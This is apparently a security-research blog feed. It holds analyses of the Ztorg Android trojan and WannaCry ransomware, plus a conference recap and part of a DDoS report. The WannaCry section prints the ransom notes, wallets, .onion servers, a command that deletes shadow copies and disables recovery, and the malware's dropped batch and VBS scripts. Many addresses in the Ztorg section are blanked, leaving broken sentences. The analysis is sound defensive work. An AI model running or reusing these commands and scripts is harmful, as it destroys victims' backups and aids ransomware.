This URL structure (offer_id=..&aff_id=..&campaign=..) is related to the OffersLook tracking system. It contains many interesting things, like offer id, affiliate id. But it turns out that cybercriminals use different values for them, making these parameters unusable for us. Except one – install_callback. This parameter contains the name of the ad service.

While searching for I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that used the IP The same IP was used by, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, (which wasn’t mentioned in the report) was moved to a new IP –

Ad modules

Luckily I was able to find not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server

The user sees a list of advertised apps:

After the user clicks on the ads, they are redirected to the Google Play Store.

In this case, the redirects look like this: ->> -> -> -> ->

After analyzing ad campaigns containing, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources callbacks

Yeahmobi ( 41% Mobvista ( 34% Avazu ( 18% Supersonicads ( 7%

However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi-> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:









I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder’s name Type Detection %* DownloadProvider Malware 81% TF47HV2VFKD9 Malware 56% snowfoxcr AdWare 51% nativedroid Malware 48% .walkfree AdWare 33% ceroa AdWare 20% sysAndroid Malware 16% .googleplay_download Malware 15%

* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

com.equalizer.goods.listener com.ele.wall.papers com.voice.equalizer.musicssss com.amusing.notes.done

When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

  1. trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

  2. liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

  3. nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.


Every infected app from Google Play with this type of malicious module was protected by the packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. Malicious code will be triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events. It means that malicious code only starts executing after the user installs/updates/removes an app.

As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C ( and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.


Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.


The library will decode this answer and xor it with a 0x66 key.



g_class_name = b.a.b.a

g_method_name = b

g_url =

g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.


In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called is xored with 0x12 and then loaded using the ClassLoad method.

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains and, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/ file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools File name Tool name MD5 data/files/.zog/.a chattr 9CAE8D66BE1103D737676DBE713B4E52 data/files/.zog/.a chattr 1E42373FA7B9339C6C0A2472665BF9D4 data/files/.zog/supolicy supolicy cdceafedf1b3c1d106567d9ff969327a data/files/.zog/busybox busybox 3bc5b9386c192d77658d08fe7b8e704f data/files/.zog/.j Patched su 8fb60d98bef73726d4794c2fc28cd900 Exploits, exploit packs, exploit droppers File Name Name MD5 Detection name data/files/.Ag/Agcr Agcr32 D484A52CFB0416CE5294BF1AC9346B96 data/files/.Ag/Agcr Agcr64 B111DD21FD4FCEFDC8268327801E55CE data/files/.zog/.ag/bx Bx 70EBFA94C958E6E6A7C6B8CD61B71054 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/cx cx 892E033DA182C06794F2B295377B8A65 Exploit.AndroidOS.Lotoor.bu data/files/.zog/exp exp 6E17234C57308012911C077A376538DC data/files/.zog/.ag/ maink.apk/boy ab9202ccfdd31e685475ba895d1af351 script data/files/.zog/.ag/ maink.apk/bx 70ebfa94c958e6e6a7c6b8cd61b71054 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/ym ym32 F973BAA67B170AB52C4DF54623ECF8B3 Exploit.AndroidOS.Lotoor.bu data/files/.zog/.ag/ym ym64 807A6CF3857012E41858A5EA8FBA1BEF Exploit.AndroidOS.Lotoor.bu data/files/.zog/.aa mainp.apk/r1 c27e59f0f943cf7cc2020bda7efb442a data/files/.zog/.aa mainp.apk/r2 368df668d4b62bdbb73218dd1f470828 data/files/.zog/.aa mainp.apk/r3 fb8449d1142a796ab1c8c1b85c7f6569 data/files/.zog/.aa mainp.apk/r4 04dd488783dffcfd0fa9bbac00dbf0f9 Exploit.Linux.Enoket.a data/files/.zog/.ad mainmtk.apk b4b805dc90fa06c9c7e7cce3ab6cd252 data/files/.zog/.ag/np np 1740ae0dc078ff44d9f229dccbd9bf61 Exploit.Linux.Enoket.a

Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

Native (ELF) malicious modules File Name MD5 Path after infection Detection name data/files/.zog/.am b30c193f98e83b7e6f086bba1e17a9ea /system/xbin/.gasys Backdoor.AndroidOS.Ztorg.j data/files/.zog/.an 41ab20131f53cbb6a0fb69a143f8bc66 /system/lib/ Backdoor.AndroidOS.Ztorg.j data/files/.zog/.b ae822aed22666318c4e01c8bd88ca686 /system/xbin/.gap.a Backdoor.AndroidOS.Ztorg.c data/files/.zog/.k 5289027ca9d4a4ed4663db445d8fc450 /system/bin/debuggerd Backdoor.AndroidOS.Ztorg.c data/files/.zog/.m 5af47875666c9207110c17bc8627ce30 /system/bin/ddexe script data/files/.zog/.c d335ac148f6414f0ce9c30ac63c20482 /system/xbin/.gap Backdoor.AndroidOS.Ztorg.c

All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps File Name Name MD5 Path after infection Detection name data/files/.zog/.l mains.apk 87030ae799e72994287c5b37f6675667 /system/priv-app/dpl.apk data/files/.zog/.o mains2.apk 93016a4a82205910df6d5f629a4466e9 /system/priv-app/.gmq.apk Trojan.AndroidOS.Boogr.gsh data/files/.zog/.n mainm.apk 6aad1baf679b42adb55962cdb55fb28c /system/priv-app/.gma.apk Backdoor.AndroidOS.Ztorg.a data/files/.zog/.al .al 7d7247b4a2a0e73aaf8cc1b5c6c08221 /system/priv-app/.gmtgp.apk Trojan.AndroidOS.Hiddad.c .gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is; additional domains are and

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:


The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (,,, didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (,,

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package Name Detection Md5 Ad modules co.uhi.tadsafa Trojan-Downloader.AndroidOS.Rootnik.g d1ffea3d2157ede4dcc029fb2e1c3607 mobvista, batmobi com.friend.booster 5c99758c8622339bffddb83af39b8685 mobvista, batmobi sq.bnq.gkq Trojan-Downloader.AndroidOS.Rootnik.g 10272af66ab81ec359125628839986ae mobvista, batmobi 8572aec28df317cd840d837e73b2554a mobvista

They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

  • .googleplay_download
  • .nativedroid
  • .sysAndroid
  • DownloadProvider

All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Despite the fact that almost every Trojan from Google Play found during this research had one of the three malicious modules described in this research, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

It used the same command and control servers as .gmtgp.apk.


During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has modular architecture and it uses several modules with different functionality and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.

BSides Denver 2017

Sat, 05/13/2017 - 17:38

Everyone loves a decent security conference, and BSides Denver provides one with space to breathe. Folks in sunny Colorado looking for a fine local gathering found talks on advanced social engineering, APT herding, securing smart cities and more.

Even though BSides got its start as an “open source” event taking its contributors from rejected Black Hat talks, this isn’t the island of misfit toys. Quality content is delivered at all of them. Here is Mandiant’s Hunter Hardman talking advanced social engineering techniques he tends to shun, opting for email available and helpful soft Marketing and HR targets. Discussion afterwards broke out about the value of breakout news stories during red team projects, like the current political environment’s effect on employee healthcare plans in the US.

Kyle Chambers from municpal energy provider Austin Energy presented ideas and thoughts on smart city implementations, audits, smart meters and data collection, and real world integration experiences.

Considering the issues with IoT implementations and the immaturity of development cycles in the IoT space, along with the true nature of the risk involved, it’s a particularly alarming topic. And it’s great to see it being carefully discussed by organizations like Austin Energy.

Hope to see you at BSides Denver 2018!

WannaCry ransomware used in widespread attacks all over the world

Fri, 05/12/2017 - 13:30

Earlier today, our products detected and successfully blocked a large number of ransomware attacks around the world. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames.

Our analysis indicates the attack, dubbed “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.


A few hours ago, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommends the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack.

The National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions. We have confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

It’s important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak.

CCN-CERT alert (in Spanish)

Analysis of the attack

Currently, we have recorded more than 45,000 attacks of the WannaCry ransomware in 74 countries around the world, mostly in Russia. It’s important to note that our visibility may be limited and incomplete and the range of targets and victims is likely much, much higher.

Geographical target distribution according to our telemetry for the first few hours of the attack

The malware used in the attacks encrypts the files and also drops and executes a decryptor tool. The request for $600 in Bitcoin is displayed along with the wallet. It’s interesting that the initial request in this sample is for $600 USD, as the first five payments to that wallet is approximately $300 USD. It suggests that the group is increasing the ransom demands.

The tool was designed to address users of multiple countries, with translated messages in different languages.

Language list that the malware supports

Note that the “payment will be raised” after a specific countdown, along with another display raising urgency to pay up, threatening that the user will completely lose their files after the set timeout. Not all ransomware provides this timer countdown.

To make sure that the user doesn’t miss the warning, the tool changes the user’s wallpaper with instructions on how to find the decryptor tool dropped by the malware.

An image used to replace user’s wallpaper

Malware samples contain no reference to any specific culture or codepage other than universal English and Latin codepage CP1252. The files contain version info stolen from random Microsoft Windows 7 system tools:

Properties of malware files used by WannaCry

For convenient bitcoin payments, the malware directs to a page with a QR code at btcfrog, which links to their main bitcoin wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94. Image metadata does not provide any additional info:

One of the Bitcoin wallets used by the attackers: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

One of the attacker wallets received 0.88 BTC during the last hours

Another Bitcoin wallets included in the attackers’ “readme.txt” from the samples are:
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn – 0.32 BTC

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw – 0.16 BTC

For command and control, the malware extracts and uses Tor service executable with all necessary dependencies to access the Tor network:

A list of dropped files related to Tor service

In terms of targeted files, the ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

The file extensions that the malware is targeting contain certain clusters of formats including:

  1. Commonly used office file extensions (.ppt, .doc, .docx, .xlsx, .sxi).
  2. Less common and nation-specific office formats (.sxw, .odt, .hwp).
  3. Archives, media files (.zip, .rar, .tar, .bz2, .mp4, .mkv)
  4. Emails and email databases (.eml, .msg, .ost, .pst, .edb).
  5. Database files (.sql, .accdb, .mdb, .dbf, .odb, .myd).
  6. Developers’ sourcecode and project files (.php, .java, .cpp, .pas, .asm).
  7. Encryption keys and certificates (.key, .pfx, .pem, .p12, .csr, .gpg, .aes).
  8. Graphic designers, artists and photographers files (.vsd, .odg, .raw, .nef, .svg, .psd).
  9. Virtual machine files (.vmx, .vmdk, .vdi).

The WannaCry dropper drops multiple “user manuals” on different languages:

Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, Vietnamese

The example of a “user manual” in English:

What Happened to My Computer?
Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
You can decrypt some of your files for free. Try now by clicking .
But if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don't pay in 7 days, you won't be able to recover your files forever.
We will have free events for users who are so poor that they couldn't pay in 6 months.

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click .
Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
And send the correct amount to the address specified in this window.
After your payment, click . Best time to check: 9:00am - 11:00am GMT from Monday to Friday.
Once the payment is checked, you can start decrypting your files immediately.

If you need our assistance, send a message by clicking .

We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets
updated and removes this software automatically, it will not be able to recover your files even if you pay!

It also drops batch and VBS script files, and a “readme” (contents are provided in the appendix).

Just in case the user closed out the bright red dialog box, or doesn’t understand it, the attackers drop a text file to disk with further instruction. An example of their “readme” dropped to disk as “@Please_Read_Me@.txt” to many directories on the victim host. Note that the English written here is done well, with the exception of “How can I trust?”. To date, only two transactions appear to have been made with this 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn bitcoin address for almost $300:

Q: What's wrong with my files?

A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!

Q: What do I do?

A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)

Q: How can I trust?

A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.

* If you need our assistance, send a message by clicking on the decryptor window.

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

  • attrib +h .
  • icacls . /grant Everyone:F /T /C /Q
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • @WanaDecryptor@.exe fi
  • 300921484251324.bat
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe

The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

This results in an UAC popup that user may notice.

UAC popup to disable Volume Shadow Service (System Restore)

The malware use TOR hidden services for command and control. The list of .onion domains inside is as following:

  • gx7ekbenv2riucmf.onion
  • 57g7spgrzlojinas.onion
  • Xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • sqjolphimrr7jqw6.onion
Mitigation and detection information

Quite essential in stopping these attacks is the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample managed to bypass other defenses. This is extremely useful in case a ransomware sample slips paste defenses and attempts to encrypt the data on the disk.

System Watcher blocking the WannaCry attacks

Mitigation recommendations:

  1. Make sure that all hosts are running and have enabled endpoint security solutions.
  2. Install the official patch (MS17-010) from Microsoft, which closes the affected SMB Server vulnerability used in this attack.
  3. Ensure that Kaspersky Lab products have the System Watcher component enabled.
  4. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Once again, make sure MS17-010 patches are installed.

Samples observed in attacks so far:


Kaspersky Lab detection names:


Kaspersky Lab experts are currently working on the possibility of creating a decryption tool to help victims. We will provide an update when a tool is available.


Batch file

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")>> m.vbs

echo om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe">> m.vbs

echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0


SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe"

DDOS attacks in Q1 2017

Thu, 05/11/2017 - 05:00

News Overview

Thanks to IoT botnets, DDoS attacks have finally turned from something of a novelty into an everyday occurrence. According to the A10 Networks survey, this year the ‘DDoS of Things’ (DoT) has reached critical mass – in each attack, hundreds of thousands of devices connected to the Internet are being leveraged.

The fight against this phenomenon is just beginning – IoT equipment vendors are extremely slow to strengthen information security measures in their own products. However, certain successes have been achieved in combating attackers behind the DDoS of Things. The well-known info security journalist Brian Krebs managed to identify the author of the infamous IoT malware Mirai. In the UK, the author of an attack on Deutsche Telekom was arrested. According to the charges, he allegedly assembled an IoT botnet from routers in order to sell access to it. He faces up to 10 years in prison in Germany.

Cheaper DoS tools and a growth in their number has caused an inevitable increase in the number of attacks on notable resources. For instance, unknown attackers took down the site of the Austrian Parliament, as well as more than a hundred government servers in Luxembourg. No one took responsibility for the attacks and no demands were made, which may mean the attacks were a test run, or simply hooliganism.

Plans by supporters of the Democratic Party to launch a massive attack on the White House site as a protest against the election of Donald Trump the US president came to nothing – there were no reports of problems with the site. Nevertheless, DDoS attacks have taken root in the US as a type of political protest. Two weeks before the inauguration, the conservative news site Drudge Report, which actively supported Trump during the election campaign, was attacked.

Law enforcement agencies took notice of this alarming trend, and the US Department of Homeland Security eventually stepped in to provide protection from DDoS attacks. The Department declared it aimed to “build effective and easily implemented network defenses and promote adoption of best practices by the private sector” in order “to bring about an end to the scourge of DDoS attacks.”

However, the main goal of the DDoS authors is still to make money. In this respect, banks and broker companies remain the most attractive targets. DDoS attacks are capable of causing such serious material and reputational damage that many organizations prefer to pay the cybercriminals’ ransom demands.

Trends of the quarter

There’s usually a distinct lull in DDoS attacks at the beginning of the year. This may be due to the fact that the people behind these attacks are on vacation, or perhaps there’s less demand from their customers. In any case, this trend has been observed for the last five years – Q1 is off season. The first quarter of this year was no exception: Kaspersky Lab’s DDoS prevention group recorded very low attack activity. This was in stark contrast to the fourth quarter of 2016. However, despite the now habitual downturn, Q1 of 2017 saw more attacks than the first quarter of 2016, which confirms the conclusion that the overall number of DDoS attacks is growing.

Due to the traditional Q1 lull, it’s too early to talk about any trends for 2017; however, a few interesting features are already noticeable:

  1. 1. Over the reporting period, not a single amplification-type attack was registered, although attacks to overload a channel without amplification (using a spoofed IP address) were in constant use. We can assume that amplification attacks are no longer effective and are gradually becoming a thing of the past.

  2. 2. The number of encryption-based attacks has increased, which is in line with last year’s forecasts and current trends. However, this growth cannot as yet be called significant.

As we predicted, complex attacks (application-level attacks, HTTPS) are gaining in popularity. One example was the combined attack (SYN + TCP Connect + HTTP-flood + UDP flood) on the Moscow stock exchange. A distinct feature of this attack was its rare multi-vector nature in combination with relatively low power (3 Gbps). To combat such attacks, it’s necessary to use the latest complex protection mechanisms.

Yet another unusual attack affected the site of the Portuguese police force. A notable feature of this attack was the use of vulnerabilities in reverse proxy servers to generate attack traffic. We assume the cybercriminals were trying to disguise the real source of the attack; and to generate traffic, new types of botnets were used, consisting of vulnerable reverse proxies.

On the whole, Q1 2017 didn’t bring any surprises. In the second quarter, we expect to see a gradual increase in the proportion of distributed attacks. Based on the next quarter’s results, it may be possible to get an idea of what we will face in 2017. For now, we can only guess.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various types and complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the first quarter of 2017.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q1 Summary
  • Resources in 72 countries (vs. 80 in Q4 2016) were targeted by DDoS attacks in Q1 2017.
  • 47.78% of targeted resources were located in China which is significantly lower than the previous quarter (71.60%).
  • China, South Korea and the US remained leaders in terms of both number of DDoS attacks and number of targets, while the Netherlands replaced China in terms of number of detected servers.
  • The longest DDoS attack in Q1 2017 lasted for 120 hours – 59% shorter than the previous quarter’s maximum (292 hours). A total of 99.8% of attacks lasted less than 50 hours.
  • The proportion of attacks using TCP, UDP and ICMP grew considerably, while the share of SYN DDoS declined from 75.3% in Q4 2016 to 48% in the first quarter of 2017.
  • For the first time in a year, activity by Windows-based botnets has exceeded that of Linux botnets, with their share increasing from 25% last quarter to 59.8% in Q1 2017.
Geography of attacks

